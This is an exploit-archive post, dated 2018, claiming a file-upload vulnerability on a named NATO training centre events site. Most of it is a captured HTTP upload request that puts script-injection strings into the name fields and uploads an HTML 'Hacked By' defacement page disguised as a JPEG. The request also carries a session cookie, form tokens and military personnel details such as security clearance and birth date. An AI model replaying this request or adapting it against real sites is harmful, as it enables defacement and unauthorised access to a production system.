NATO Training Center Upload Vulnerability

2018.05.09

God3err (TR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

NATO Upload Vulnerability
----------------------------------------------------------------
Site: https://events.jftc.nato.int
----------------------------------------------------------------
Videos : https://www.youtube.com/watch?v=sxfdmc-FE5M
----------------------------------------------------------------
Vulnerable POST Code : 
----------------------------------------------------------------
17:28:39.016
[4438ms]
[total 4438ms] 
Status: 200[OK]

POST https://events.jftc.nato.int/user/26426/userdata?element_parents=userdata/user_picture&ajax_form=1&_wrapper_format=drupal_ajax&_wrapper_format=drupal_ajax 
Load Flags[LOAD_BACKGROUND  LOAD_BYPASS_LOCAL_CACHE  ] 
Content Size[-1] 
Mime Type[application/json]
   
Request Headers:
      
Host[events.jftc.nato.int]
      
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.7.2]
      
Accept[application/json, text/javascript, */*; q=0.01]
      
Accept-Language[en-US,en;q=0.5]
      
Accept-Encoding[gzip, deflate, br]
      
X-Requested-With[XMLHttpRequest]
      
Referer[https://events.jftc.nato.int/user/26426/userdata]
      
Content-Length[7132]
      
Content-Type[multipart/form-data; boundary=---------------------------23222661824199]
      
Cookie[SSESS15be87fcc393b12e70eb4c4f98ed97bc=yV8zL34h9yB25fKnjwRcU6TDMwW6JnpCKenpm1T6ghA]
      
Connection[keep-alive]
   
Post Data:
 
     
POST_DATA[-----------------------------23222661824199
Content-Disposition: form-data; name="name"


-----------------------------23222661824199
Content-Disposition: form-data; name="first_name"

">ALERT(0);
-----------------------------23222661824199
Content-Disposition: form-data; name="surname"

">ALERT(0);
-----------------------------23222661824199
Content-Disposition: form-data; name="gender"

F
-----------------------------23222661824199
Content-Disposition: form-data; name="nato_rank_title"

OR3
-----------------------------23222661824199
Content-Disposition: form-data; name="national_title"

TUR
-----------------------------23222661824199
Content-Disposition: form-data; name="service"

ARMY
-----------------------------23222661824199
Content-Disposition: form-data; name="nationality"

Turkey (TUR)
-----------------------------23222661824199
Content-Disposition: form-data; name="id_number"

1213123123123
-----------------------------23222661824199
Content-Disposition: form-data; name="nato_security_clearance"

NATO Secret
-----------------------------23222661824199
Content-Disposition: form-data; name="organization[select]"

1 GNC
-----------------------------23222661824199
Content-Disposition: form-data; name="organization[other]"


-----------------------------23222661824199
Content-Disposition: form-data; name="contact_phone"

05********
-----------------------------23222661824199
Content-Disposition: form-data; name="ns_wan_address"

safasfasf
-----------------------------23222661824199
Content-Disposition: form-data; name="files[user_picture]"; filename="index.jpg"
Content-Type: image/jpeg

ï»¿<html><h1>Hacked By God3err<h1></html>
-----------------------------23222661824199
Content-Disposition: form-data; name="user_picture[fids]"


-----------------------------23222661824199
Content-Disposition: form-data; name="security_clearance_fid[fids]"

6741
-----------------------------23222661824199
Content-Disposition: form-data; name="height"

168
-----------------------------23222661824199
Content-Disposition: form-data; name="eye_color"

Blue
-----------------------------23222661824199
Content-Disposition: form-data; name="marital_status"

married
-----------------------------23222661824199
Content-Disposition: form-data; name="birth_date"

1974-05-06
-----------------------------23222661824199
Content-Disposition: form-data; name="birth_town"

burdur
-----------------------------23222661824199
Content-Disposition: form-data; name="birth_country"

Afghanistan (AFG)
-----------------------------23222661824199
Content-Disposition: form-data; name="form_build_id"

form-vx5EXbx7djtg3TbaVszCcjOGLwqKe4DIHifWokHwsbY
-----------------------------23222661824199
Content-Disposition: form-data; name="form_token"

AsFqzDYst8b5UPULTTcOzKKSHtro8GetqNghSR9N-y8
-----------------------------23222661824199
Content-Disposition: form-data; name="form_id"

simple_form
-----------------------------23222661824199
Content-Disposition: form-data; name="_triggering_element_name"

user_picture_upload_button
-----------------------------23222661824199
Content-Disposition: form-data; name="_triggering_element_value"

Upload
-----------------------------23222661824199
Content-Disposition: form-data; name="_drupal_ajax"

1
-----------------------------23222661824199
Content-Disposition: form-data; name="ajax_page_state[theme]"

bstheme
-----------------------------23222661824199
Content-Disposition: form-data; name="ajax_page_state[theme_token]"


-----------------------------23222661824199
Content-Disposition: form-data; name="ajax_page_state[libraries]"

autologout/drupal.autologout,bootstrap/popover,bootstrap/tooltip,bstheme/bootstrap-scripts,bstheme/global-styling,core/drupal.active-link,core/drupal.date,core/drupal.states,core/html5shiv,core/jquery.form,core/jquery.form,d_filtertable/filtertable,d_signup/signup_registrant_info_sticky,d_signup/signup_select_row,file/drupal.file,file/drupal.file,hide_submit/hide_submit,system/base
-----------------------------23222661824199--
]
   Response Headers:
      Server[nginx]
      Date[Tue, 08 May 2018 14:28:43 GMT]
      Content-Type[application/json]
      Cache-Control[must-revalidate, no-cache, private]
      x-ua-compatible[IE=edge]
      Content-Language[en]
      X-Content-Type-Options[nosniff]
      X-Frame-Options[SAMEORIGIN]
      Expires[Sun, 19 Nov 1978 05:00:00 GMT]
      Vary[Accept-Encoding]
      x-generator[Drupal 8 (https://www.drupal.org)]
      x-drupal-ajax-token[1]
      Content-Encoding[gzip]
      x-request-id[v-1bf98b42-52cc-11e8-903d-22000a271e78]
      x-ah-environment[prod]
      x-varnish[713984183]
      Age[0]
      via[1.1 varnish-v4]
      X-Cache[MISS]
      Accept-Ranges[bytes]
      X-Firefox-Spdy[h2]
------------------------------------------------------------------------
//God3err - Thanks For Reading
------------------------------------------------------------------------
Twitter : @KizilKullanici
------------------------------------------------------------------------
☭ God3err ☭
------------------------------------------------------------------------

References:

https://www.youtube.com/watch?v=sxfdmc-FE5M

See this note in RAW Version

Vote for this issue:

57%

43%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

NATO Training Center Upload Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.